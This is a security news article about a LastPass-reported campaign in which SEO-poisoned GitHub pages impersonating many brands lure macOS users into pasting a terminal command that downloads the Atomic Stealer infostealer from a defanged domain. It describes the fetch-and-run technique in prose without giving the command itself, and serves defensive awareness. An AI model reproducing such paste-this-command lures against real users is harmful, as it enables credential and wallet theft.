LastPass has warned of a widespread malware campaign in which attackers are abusing GitHub repositories to distribute Atomic Stealer (AMOS), an infostealer targeting Apple macOS systems. The company’s Threat Intelligence, Mitigation, and Escalation (TIME) team uncovered the operation earlier this month.
The campaign impersonates more than 100 popular brands, including password managers (LastPass, 1Password), financial firms (Citibank, Fidelity, Charles Schwab), cryptocurrency apps (Bitpanda, Blue Wallet), and productivity tools (Notion, Basecamp, Obsidian). Attackers combine SEO manipulation with developer platforms like GitHub to take advantage of user trust, showing that macOS is no longer just a minor target for cybercrime.
Attackers rely on SEO poisoning to push fraudulent GitHub pages to the top of Google and Bing search results. These pages display “Install on MacBook” links that redirect to secondary domains. There, victims are instructed to paste a terminal command that performs a cURL request to a base64-encoded URL hosted at bonoud[.]com. This request downloads an installer labeled “Update” to the system’s temporary directory, which is actually the AMOS payload.
Atomic Stealer, first seen in April 2023, exfiltrates browser autofill entries, stored credentials, cryptocurrency wallet keys and local files, its deployment in this campaign signals a growing move by financially motivated actors to target macOS.
LastPass confirmed its own brand was spoofed, with two GitHub Pages posted by the user “modhopmduck476” on September 16. These were swiftly reported and removed, but the attackers continue to create new accounts to circumvent takedowns.
LastPass said it is continuing to monitor the campaign, submit fraudulent repositories for takedown, and has shared a comprehensive set of indicators of compromise (IoCs) to help other security teams identify related activity.
The campaign illustrates how cybercriminals are now combining search engine manipulation with trusted developer platforms such as GitHub to deceive users, signaling that macOS has moved firmly into the spotlight as a priority target for online crime rather than remaining on the sidelines.
Caught feelings for cybersecurity? It’s okay, it happens. Follow us on LinkedIn and Instagram to keep the spark alive.
